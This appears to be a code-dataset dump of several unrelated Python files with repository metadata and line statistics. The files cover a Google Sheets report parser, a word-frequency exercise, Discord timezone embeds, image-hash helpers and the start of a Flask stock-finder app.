undo = partial(skin_cluster.setWeights, dag, components, influences, weights_old)
redo = partial(skin_cluster.setWeights, dag, components, influences, weights_new)
apiundo.commit(undo=undo, redo=redo)
redo()
| 32.066667
| 90
| 0.69106
| 295
| 2,405
| 5.532203
| 0.349153
| 0.094363
| 0.025735
| 0.038603
| 0.251225
| 0.229167
| 0.229167
| 0.229167
| 0.158088
| 0.158088
| 0
| 0
| 0.208732
| 2,405
| 74
| 91
| 32.5
| 0.857593
| 0.401247
| 0
| 0
| 0
| 0
| 0.034039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3817bdbf09d70c073184d064ea74bede74d6b3
| 1,607
|
py
|
Python
|
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | 1
|
2019-06-05T11:16:08.000Z
|
2019-06-05T11:16:08.000Z
|
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | null | null | null |
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | null | null | null |
import re
REGEX = {
"name": r"name is (?P<name>[A-Z][A-Za-z]+ [A-Z][A-Za-z]+)",
"age": r" (?P<age>[0-9]{2}) years",
"date": r"on (?P<date>[0-9]{2}-[0-9]{2}-[0-9]{4})."
}
class Person:
def __init__(self, full_name, age, birth_date):
self.__full_name = full_name
self.__age = age
self.__birth_date = birth_date
@property
def full_name(self):
return self.__full_name
@property
def age(self):
return self.__age
@property
def birth_date(self):
return self.__birth_date
def __str__(self):
return f"Name of the person: {self.full_name}.\n" \
f"Age of the person: {self.age}.\n" \
f"Birthdate of the person: {self.birth_date}."
db = []
while True:
line = input()
if "make migrations" == line:
break
if line[len(line) - 1] != '.':
continue
params = {}
for requirement, regex in REGEX.items():
match = re.search(regex, line)
if not match:
params = {}
break
if requirement == "age":
age = int(match.group(requirement))
if age <= 9 or age >= 100:
break
params["age"] = age
elif requirement == "name":
params["name"] = match.group(requirement)
elif requirement == "date":
params["date"] = match.group(requirement)
if params:
db.append(Person(full_name=params["name"], age=params["age"], birth_date=params["date"]))
if not db:
print("DB is empty")
else:
print("\n".join(map(str, db)))
| 23.289855
| 97
| 0.533914
| 215
| 1,607
| 3.832558
| 0.297674
| 0.067961
| 0.058252
| 0.054612
| 0.024272
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015247
| 0.306161
| 1,607
| 68
| 98
| 23.632353
| 0.723767
| 0
| 0
| 0.153846
| 0
| 0.038462
| 0.185439
| 0.037337
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096154
| false
| 0
| 0.019231
| 0.076923
| 0.211538
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3a72f79061cb96a4d85d2974153bcda4983c49
| 7,667
|
py
|
Python
|
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
"""
NOTE on google sheets format:
The google sheets document must have the following:
Columns A and B from cell 2 down are all the sample details
Column A is the name of the detail and Column B is the value of the detail
Columns B and onwards can be anything but there must be three speicifc columns
Replicate, Test Name, Result
Each row in these columns is counted as a test result and are grouped together
by test name, replicate
All rows must have a unique TestName-Replicate combination or an error is shown
"""
from SampleData import SampleData
from SRGJob import SRGJob
import time
class GoogleSheetsJobParser:
""" Opens a google sheets document and parses the contents into a job class """
def __init__(self, view):
self.view = view
pass
def parse_document(self, service, document_id):
""" The main function that opens the document, parses the data into a jobs
object and returns the resulting job with all the calculated values
Args:
service (google sheets service): the googlse sheets api service
document_id (str): the google sheets document id to fetch and process
Returns:
job (SRGJob): the job object containing all the job information
and calculated results from the data
"""
# Call the Sheets API to get a reference to the sheet
sheet_ref = service.spreadsheets().get(spreadsheetId=document_id)
#get the sheet details such as individual sheet names, each test sample
#will be on a separate sheet
sheet_details = sheet_ref.execute()
#The job object will hold the list of samples and their data
job = SRGJob()
#go through each sheet in the spreadsheets and process into a SampleData object
for sheet in sheet_details.get('sheets'):
title = sheet.get('properties').get('title')
self.view.display_message("Processing: {}".format(title))
#special Details tab is used to extract the details required for the report
if title == "Details":
self.parse_details(sheet, job, service, document_id)
else:
self.parse_sample(sheet, job, service, document_id)
#slow down the requests as to not brech the x requets in 100 seconds
time.sleep(10)
#return None if no samples were added to this job
if len(job.samples) > 0:
return job
else:
return None
def parse_details(self, sheet, job, service, document_id):
""" Parses the details tab which has information about the report
Args:
sheet (google sheet): The google sheet to process
job (SRGJob): the pointer to the job object to hold all the results
service (google sheets service): the google sheets api service
document_id (str): the google sheets document id to fetch and process
"""
#get the first row with all the column headings as well as the first two
#columns which contain the sample details
result = service.spreadsheets().values().get(spreadsheetId=document_id,
range='Details!A2:B101').execute()
#fields columns, first column is name of field and second
#column is the value for the field
values = result.get('values', [])
for row in values:
if len(row) == 2 and row[0] != '':
job.fields[row[0]] = row[1]
def parse_sample(self, sheet, job, service, document_id):
""" Parses each tab in the sheet as a separate sample.
Args:
sheet (google sheet): The google sheet to process
job (SRGJob): the pointer to the job object to hold all the results
service (google sheets service): the google sheets api service
document_id (str): the google sheets document id to fetch and process
"""
#get the title of the sheet to be used for the ranges reference in batchGet()
title = sheet.get('properties').get('title')
#rowCount is taken here so we know how many rows to extract from the sheet
row_count = sheet.get('properties').get('gridProperties').get('rowCount')
#get the first row with all the column headings as well as the first two
#columns which contain the sample details
result = service.spreadsheets().values().batchGet(spreadsheetId=document_id,
ranges=['{0}!A2:B101'.format(title),
'{0}!A1:Z1'.format(title)]).execute()
#The first element in this array is the sample details columns
#the second element is the column names ie. first row of sheet
valueRanges = result.get('valueRanges', [])
#create a sample data object to store all the extracted data
sample_data = SampleData()
#Sample details columns, first column is name of detail and second
#column is the value for the detail
values = valueRanges[0].get('values', [])
for row in values:
if len(row) == 2 and row[0] != '':
sample_data.add_detail(row[0], row[1])
#names of all the columns in the spreadsheet. Need to get the index
#of the Test Name and Result columns, these are the data columns that
#need to be extracted from the sheet
values = valueRanges[1].get('values', [])
try:
tn_col_index = values[0].index("Test Name")
res_col_index = values[0].index("Result")
except ValueError:
#don't add this sample because the required columns did not exist
return
#convert the index of these columns to the column letter, columns
#are letters in spreadsheets not numbers
alpha_codes = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
tn_code = alpha_codes[tn_col_index]
res_code = alpha_codes[res_col_index]
#make another request to the sheets api to get the test result data
#from the Test Name and Result columns found above
data_result = service.spreadsheets().values().batchGet(spreadsheetId=document_id,
ranges=['{0}!{1}2:{1}{2}'.format(title, tn_code, row_count),
'{0}!{1}2:{1}{2}'.format(title, res_code, row_count)]).execute()
#The first element in data_values will be the Test Name column array
#the second element will be the Result column array
data_values = data_result.get('valueRanges', [])
tn_data = data_values[0].get('values', [])
res_data = data_values[1].get('values', [])
#go through each row in the extracted data and get the value for
#Test Name and Result
for i in range(len(tn_data)):
#Add the Result for this Test Name to the sample_data test result array
if len(tn_data[i]) > 0 and len(res_data[i]) > 0:
sample_data.add_result(tn_data[i][0], res_data[i][0])
#if this sample had some useable data then add it to the job object
if len(sample_data.details) > 0 and len(sample_data.test_results) > 0:
job.add_sample(sample_data)
| 43.811429
| 104
| 0.60493
| 1,015
| 7,667
| 4.502463
| 0.214778
| 0.032823
| 0.029759
| 0.020131
| 0.315536
| 0.271554
| 0.234792
| 0.212691
| 0.199125
| 0.199125
| 0
| 0.009472
| 0.32529
| 7,667
| 175
| 105
| 43.811429
| 0.873961
| 0.478805
| 0
| 0.129032
| 0
| 0
| 0.067358
| 0.00709
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.016129
| 0.048387
| 0
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3a92014d6912b9f49fb4d369df04c828bdc5f0
| 6,565
|
py
|
Python
|
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | 7
|
2017-08-13T03:03:55.000Z
|
2022-02-06T17:08:12.000Z
|
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | null | null | null |
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | 10
|
2017-09-29T08:22:10.000Z
|
2021-06-17T22:51:59.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 28 22:41:26 2017
@author: lamahamadeh
"""
'''
Case Study about Language Processing
'''
#counting words
#---------------
text = "This is a test text. We're keping this text short to keep things manageable." #test text
#Using loops
#-----------
def count_words(text):
"""count the number of times each word occurs in text (str).
Return dictionary where keys are unique words and values are
word counts. skip punctuations"""
text = text.lower() #lowercase for the counting letters so the function can cont the same words whether it's capatilised or not
skips = [".", ",", ";", ":", "'", '"'] #skipping all the punctuations to not be counted with the words that come bfore them
for ch in skips:
text = text.replace(ch,"")
word_counts = {}
for word in text.split(" "):
if word in word_counts: #known word case
word_counts[word] += 1
else:
word_counts[word] = 1 #unknown word case
return word_counts
print(count_words(text))
print(len(count_words("This comprehension check is to check for comprehension.")))#first quiz question
#------------------------------------------------------------------------------
#using collections module
#-------------------------
from collections import Counter
def count_words_fast(text):
"""count the number of times each word occurs in text (str).
Return dictionary where keys are unique words and values are
word counts. skip punctuations"""
text = text.lower() #lowercase for the counting letters so the function can cont the same words whether it's capatilised or not
skips = [".", ",", ";", ":", "'", '"'] #skipping all the punctuations to not be counted with the words that come bfore them
for ch in skips:
text = text.replace(ch,"")
word_counts = Counter(text.split(" "))
return word_counts
print(count_words_fast)
print(count_words(text)==count_words_fast(text))
print(count_words(text) is count_words_fast(text))#second quiz question
#------------------------------------------------------------------------------
#read a book
#-------------
def read_book(title_path):
"""Read a book and return it as a string"""
with open(title_path, "r", encoding = "utf8") as current_file: #encoding = "utf8" causes a problem when running the code in Python 2.7. However, it runs normally when using Python 3.5.
text = current_file.read()
text = text.replace("\n","").replace("\r","")
return text
text = read_book('/Users/ADB3HAMADL/Desktop/Movies/English/Nora Ephron/You Have Got Mail.txt')#read a book from its path
print(len(text))#number of charatcers in the book
#if there is a famous/wanted line in the book we can use the 'find' method to find it
ind = text.find("go to the mattresses")
print(ind) #print the index number of the famous/wanted sentence
sample_text = text[ind : ind + 953] #slice the paragraph that contains the famous line
print(sample_text) #print the whole chosen paragraph
#------------------------------------------------------------------------------
#Counting the number of unique words
#------------------------------------
def word_stats(word_counts):
"""return the number of unique words and word frequencies"""
num_unique = len(word_counts) #calculate the number of unique words in the text
counts = word_counts.values() #calculate the frequency of each word in the text
return(num_unique,counts)
text = read_book('/Users/ADB3HAMADL/Desktop/Movies/English/Nora Ephron/You Have Got Mail.txt')
word_counts = count_words(text)
(num_unique, counts) = word_stats(word_counts)
print(num_unique) #print the number of unique number of words in the text
print(sum(counts)) #print the sum of the frequency of each word in the text
#------------------------------------------------------------------------------
#Reading multiple files
#-----------------------
import os #to read directories
movie_dir = "/Users/ADB3HAMADL/Desktop/movies" #tells us how many directories in the book directory
import pandas as pd
'''
Pandas example of how to create a dataframe:
--------------------------------------------
import pandas as pd
table = pd.DataFrame(coloums = ("name" , "age"))
table.loc[1] = "James", 22
table.loc[2] = "Jess", 32
print(table)
'''
stats = pd.DataFrame(columns = ("Language" , "Director" , "Title" , "Length" , "Unique")) #this creates an empty dataframe
#with empty table elements with 5 columns
#To put data in the table
title_num =1
for Language in os.listdir(movie_dir):
for Director in os.listdir(movie_dir + "/" + Language):
for Title in os.listdir(movie_dir + "/" + Language + "/" + Director):
inputfile = movie_dir + "/" + Language + "/" + Director + "/" + Title
print(inputfile)
text = read_book(inputfile)
(num_unique, counts) = word_stats(count_words(text))
stats.loc[title_num ] = Language , Director.title(), Title.replace(".txt", " ") , sum(counts) , num_unique #.title() here capitalises the first letter from the first and last name of the director. If we want to capitalise only the first letter, we can use .capitalize().
title_num += 1
print(stats) #print the created dataframe
print(stats.head()) #print the top 5 lines
print(stats.tail()) #print the last 5 lines
print(stats[stats.Language == "English"]) #print the number of entries for language English (a subset from the whole dataframe)
#------------------------------------------------------------------------------
#Plotting Book Statistics
#-------------------------
import matplotlib.pyplot as plt
plt.plot(stats.Length, stats.Unique, "bo")
#OR we can write plt.plot(stats['length'], stats['unique'])
plt.loglog(stats.Length, stats.Unique, "bo") #it is a straight line which suggest data modelling strategies that we might use
plt.figure(figsize = (10,10))
subset = stats[stats.Language == "English"] #extract a subset that has only the rows with English Language
plt.loglog(subset.Length, subset.Unique, "o", label = "English", color = "blue")
subset = stats[stats.Language == "French"] #extract a subset that has only the rows with French Language
plt.loglog(subset.Length, subset.Unique, "o", label = "French", color = "red")
plt.legend()
plt.xlabel("Movie Length")
plt.ylabel("Number of unique words")
plt.savefig("lang_plot.pdf")
#------------------------------------------------------------------------------
#
| 36.071429
| 282
| 0.6262
| 880
| 6,565
| 4.609091
| 0.292045
| 0.034517
| 0.018984
| 0.016765
| 0.341963
| 0.302761
| 0.259862
| 0.259862
| 0.244576
| 0.203649
| 0
| 0.007909
| 0.17182
| 6,565
| 181
| 283
| 36.270718
| 0.738091
| 0.46489
| 0
| 0.157895
| 0
| 0
| 0.156619
| 0.038915
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.144737
| 0.197368
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3485a97e04399f112e63493e9a7df6b69342ec0c
| 313
|
py
|
Python
|
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
import asyncio
import aiormq
async def publish(method, event_id):
connection = await aiormq.connect('')
channel = await connection.channel()
body = bytes(str(event_id), 'utf-8')
await channel.basic_publish(
body, exchange='', routing_key='admin'
)
await connection.close()
| 20.866667
| 46
| 0.664537
| 37
| 313
| 5.513514
| 0.648649
| 0.068627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004082
| 0.217252
| 313
| 14
| 47
| 22.357143
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.031949
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3485c332458e998d42d6f67bb82de0ba508582c0
| 8,473
|
py
|
Python
|
timezone/embeds.py
|
duanegtr/legendv3-cogs
|
ffde1452a75ad42b4f6511b612ce486e96fcd6de
|
[
"MIT"
] | 10
|
2020-05-25T13:32:30.000Z
|
2022-02-01T12:33:07.000Z
|
timezone/embeds.py
|
darcyle/tl-cogs
|
6b13c4a6247115571c5a2bb6ea98ed1fe2d44d79
|
[
"MIT"
] | 2
|
2020-05-23T22:53:07.000Z
|
2020-08-09T11:28:12.000Z
|
timezone/embeds.py
|
darcyle/tl-cogs
|
6b13c4a6247115571c5a2bb6ea98ed1fe2d44d79
|
[
"MIT"
] | 7
|
2020-05-18T17:37:33.000Z
|
2022-01-13T04:08:05.000Z
|
"""Embeds for Timezone Legends discord bot."""
import time
import discord
from dateutil.parser import parse # pip install python-dateutil
from pytz import timezone
from datetime import datetime
class Timezone_Embeds:
def __init__(self, description=None, color=0x5c0708, show_footer=True, show_timestamp=True, show_thumbnail=True):
if not show_timestamp:
self.embed = discord.Embed(colour=discord.Colour(color))
else:
if not description:
self.embed = discord.Embed(colour=discord.Colour(color),
timestamp=datetime.utcfromtimestamp(time.time()))
else:
self.embed = discord.Embed(colour=discord.Colour(color),
description=description,
timestamp=datetime.utcfromtimestamp(time.time()))
if show_thumbnail:
#self.embed.set_thumbnail(url="https://cdn.iconscout.com/icon/premium/png-256-thumb/global-time-zone-1480117-1253197.png")
#self.embed.set_thumbnail(url="https://tuccitime.com/modules/xipblog/img/large-time.jpg")
self.embed.set_thumbnail(url="https://cdn.clipart.email/1cb9490f73d090921ded3aa2b1c2bf1f_different-time-zone-no-problem_513-510.png")
if show_footer:
self.embed.set_footer(text="Bot by Vanhorn | Academy",
icon_url="https://vignette.wikia.nocookie.net/clashroyale/images/4/42/GraveyardCard.png/revision/latest/top-crop/width/360/height/450?cb=20171212204803")
def set_title(self, name, icon_url):
self.embed.set_author(name=name,
url="https://discordapp.com/channels/374596069989810176/374597178989215757",
icon_url=icon_url)
async def events(ctx, event_list):
tze = Timezone_Embeds(description="Listing all Events that matched your request (**if any**)")
tze.set_title("Events", "https://www.kindpng.com/picc/m/246-2465899_upcoming-events-icon-calendar-icon-png-transparent-png.png")
for event_name, event_time, time_to_event, time_delta in event_list:
tze.embed.add_field(name="Event", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="Local Time", value=f"{event_time}", inline=True)
tze.embed.add_field(name="Time Left", value=f"**{time_to_event}**", inline=True)
await ctx.send(embed=tze.embed)
async def created_event(ctx, event, event_id, event_time):
tze = Timezone_Embeds(show_thumbnail=False)
tze.set_title("Event Created", "https://cdn2.vectorstock.com/i/1000x1000/70/11/event-schedule-icon-vector-26627011.jpg")
tze.embed.add_field(name="Name", value=f"**{event}**", inline=True)
tze.embed.add_field(name="ID", value=f"**{event_id}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
await ctx.send(embed=tze.embed)
async def removed_event(ctx, event_id, event):
"""
{'event': 'Test Event', 'when': '2020-05-07T15:46:17.156085+00:00', 'tz': 'America/New_York'}
"""
tze = Timezone_Embeds(show_thumbnail=False)
tze.set_title("Event Removed", "https://cdn2.vectorstock.com/i/1000x1000/70/11/event-schedule-icon-vector-26627011.jpg")
event_name = event['event']
event_tz = event['tz']
fmt = "**%H:%M** %d-%B-%Y **%Z (UTC %z)**"
event_time = parse(event['when']).astimezone(timezone(event_tz)).strftime(fmt)
tze.embed.add_field(name="Name", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="ID", value=f"**{event_id}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
tze.embed.add_field(name="TZ", value=f"{event_tz}", inline=True)
await ctx.send(embed=tze.embed)
async def show_events(ctx, event_list):
for idx in range(0, len(event_list)):
event_id, event_name, event_time, event_tz, time_delta = event_list[idx]
tze = Timezone_Embeds(show_footer=True if idx == len(event_list)-1 else False,
show_timestamp=True if idx == 0 else False,
show_thumbnail=True if idx == 0 else False)
tze.set_title(f"Event ({event_id})",
"https://images.squarespace-cdn.com/content/v1/5a5ced468a02c79bfe4829bf/1516978000404-CVQ1CO95BEFJ7W2FTGDM/ke17ZwdGBToddI8pDm48kBPauUSMbKdP-TlqMma_x0ZZw-zPPgdn4jUwVcJE1ZvWEtT5uBSRWt4vQZAgTJucoTqqXjS3CfNDSuuf31e0tVFzDLvN5UbLOifpAePtRMTrCg1jr8OpcUFdGiHX6l_hRjFvbuqF0GUInBxxtVhBOn4/events-icon-website-gray.png")
tze.embed.add_field(name="Name", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
tze.embed.add_field(name="TZ", value=f"**{event_tz}**", inline=True)
await ctx.send(embed=tze.embed)
async def compare(ctx, display_name, other_time, time_amt, position_text):
tze = Timezone_Embeds()
tze.set_title("User TZ Compare", "https://cdn3.iconfinder.com/data/icons/calendar-23/100/Calendar-15-512.png")
tze.embed.add_field(name=f"{display_name}'s time", value=f"**{other_time}**", inline=True)
tze.embed.add_field(name="Which is", value=f"**{time_amt}{position_text}**", inline=True)
await ctx.send(embed=tze.embed)
async def iso(ctx, code=None, tz=None):
tze = Timezone_Embeds()
tze.set_title("ISO", "https://images.assetsdelivery.com/compings_v2/aalbedouin/aalbedouin1808/aalbedouin180806226.jpg")
if not code or not tz:
tze.embed.add_field(name=f"**{code}** is invalid. For a full list, see here:", value="[Timezone Link](<https://en.wikipedia.org/wiki/List_of_ISO_3166_country_codes>)", inline=False)
else:
timezones = '\n'.join(tz)
tze.embed.add_field(name=f"Supported timezones for **{code}**:", value=f"**{timezones}**", inline=False)
tze.embed.add_field(name="**NOTE**", value=f"\n**Use** `{ctx.prefix}time tz Continent/City` **to display the current time in that timezone.**", inline=False)
await ctx.send(embed=tze.embed)
async def me(ctx, usertime, time=None):
tze = Timezone_Embeds()
if usertime and time:
tze.embed.add_field(name=f"Your current timezone is:", value=f"**{usertime}.\nThe current time is: {time}", inline=False)
else:
tze.embed.add_field(name=f"You haven't set your timezone yet...",
value=f"Do `{ctx.prefix}time me Continent/City`\nsee [Timezones](<https://en.wikipedia.org/wiki/List_of_tz_database_time_zones>)")
await ctx.send(embed=tze.embed)
async def generic_embeds(ctx, field, value, description=None):
tze = Timezone_Embeds(description)
tze.embed.add_field(name=field, value=value)
await ctx.send(embed=tze.embed)
"""
embed = discord.Embed(colour=discord.Colour(0x5c0708), description="Listing all Events that matched your request (**if any**)", timestamp=datetime.utcfromtimestamp(time.time()))
embed.set_author(name="Events",
url="https://discordapp.com/channels/374596069989810176/374597178989215757",
icon_url="https://www.kindpng.com/picc/m/246-2465899_upcoming-events-icon-calendar-icon-png-transparent-png.png")
embed.set_thumbnail(url="https://cdn.iconscout.com/icon/premium/png-256-thumb/global-time-zone-1480117-1253197.png")
embed.set_footer(text="Bot by Vanhorn | Academy",
icon_url="https://vignette.wikia.nocookie.net/clashroyale/images/4/42/GraveyardCard.png/revision/latest/top-crop/width/360/height/450?cb=20171212204803")
for event_name, event_time, time_to_event in event_list:
embed.add_field(name="Event", value=f"**{event_name}**", inline=True)
embed.add_field(name="Local Time", value=f"**{event_time}**", inline=True)
embed.add_field(name="Time Left", value=f"**{time_to_event}**", inline=True)
#print(embed.to_dict())
await ctx.send(embed=embed)
"""
"""
[x] create_event Creates an event in your timezone, or in a given t...
[x] events Lists all registered events.
[x] show_events Lists all registered events.
[x] remove_event Erases an event if the given ID is found.
[x] compare Compare your saved timezone with another user's timezone.
[x] iso Looks up ISO3166 country codes and gives you a supported ti...
[x] me Sets your timezone.
[x] set Allows the mods to edit timezones.
[x] tell Tells you what the time will be in the given timezone.
[x] tz Gets the time in any timezone.
[x] user Shows the current time for user.
"""
| 57.639456
| 331
| 0.688304
| 1,189
| 8,473
| 4.779647
| 0.232969
| 0.040824
| 0.054901
| 0.071793
| 0.535809
| 0.506599
| 0.45117
| 0.426535
| 0.373922
| 0.342425
| 0
| 0.051293
| 0.164759
| 8,473
| 146
| 332
| 58.034247
| 0.751731
| 0.03281
| 0
| 0.301075
| 0
| 0.096774
| 0.324392
| 0.004549
| 0
| 0
| 0.001255
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0.053763
| 0
| 0.086022
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34895fa122da2aa59b08dae55bc7b95297e3503a
| 1,521
|
py
|
Python
|
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
import hashlib
import shutil
import requests
import os
from config import constants
def get_sha_hash(content):
sha = hashlib.sha1()
sha.update(content)
return sha.hexdigest()
def download_image(image_url,filename_to_save):
response = requests.get(image_url, stream=True)
with open(filename_to_save, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
def get_image_hash_list(image_data_directory_path):
image_list = os.listdir(image_data_directory_path)
image_name_without_extension_list = list([])
for image_name in image_list:
extension_index = image_name.find('.')
if extension_index != -1:
image_name_without_extension_list.append(image_name[:extension_index])
return image_name_without_extension_list
def get_supported_image_hashes(image_hash_name_list):
hash_title_dict = dict({})
filtered_image_hash_dict = dict({})
with open(constants.TITLE_HASH_MAP, 'r') as title_hash_file:
title_hash_list = title_hash_file.read().split('\n')
for title_hash in title_hash_list:
sep_index = title_hash.find('=')
if sep_index != -1:
title = title_hash[:sep_index].strip()
hash_value = title_hash[sep_index+1:].strip()
hash_title_dict[hash_value] = title
for image_name in image_hash_name_list:
if image_name in hash_title_dict.keys():
filtered_image_hash_dict[image_name] = hash_title_dict[image_name]
return filtered_image_hash_dict
| 33.065217
| 82
| 0.721893
| 216
| 1,521
| 4.666667
| 0.291667
| 0.089286
| 0.051587
| 0.074405
| 0.172619
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003247
| 0.190007
| 1,521
| 45
| 83
| 33.8
| 0.814935
| 0
| 0
| 0
| 0
| 0
| 0.004602
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.138889
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
348a2b80711dded6c85af5b308b4122d1e73013c
| 14,635
|
py
|
Python
|
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
import time, os
import tomtomSearch
from flask_bootstrap import Bootstrap
from flask import Flask, render_template, request, redirect, flash, session, jsonify, url_for
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired
from datetime import datetime
from flaskext.mysql import MySQL
from pytz import timezone
'''
TODO:
-add so user can input address as well
- fix the full page 2 columns
- add information about the store
- integrate the user
- authenticate the managers
'''
class LocationForm(FlaskForm):
address = StringField('Address', validators=[DataRequired()])
item_option = SelectField('item_option', choices=[('1', 'Toilet Paper'), ('2', 'Hand Sanitizer')])
distance_option = SelectField('distance_option',
choices=[('1', '1 km'), ('5', '5 km'), ('10', '10 km'),
('15', '15 km'), ('20', '20 km')])
submit = SubmitField('Search')
class StatusForm(FlaskForm):
status_option = SelectField('status_option',
choices=[('1', 'Full Stock'), ('2', 'Majority Remaining'), ('3', 'Half Remaining'),
('4', 'Few Remaining'), ('5', 'None Remaining')])
item_option = SelectField('item_option', choices=[('1', 'Toilet Paper'), ('2', 'Hand Sanitizer')])
submit = SubmitField('Submit Status')
class StoreForm(FlaskForm):
stores = RadioField('stores', choices=[])
submit = SubmitField('View')
class optionForm(FlaskForm):
find_item = SubmitField('Find an Item')
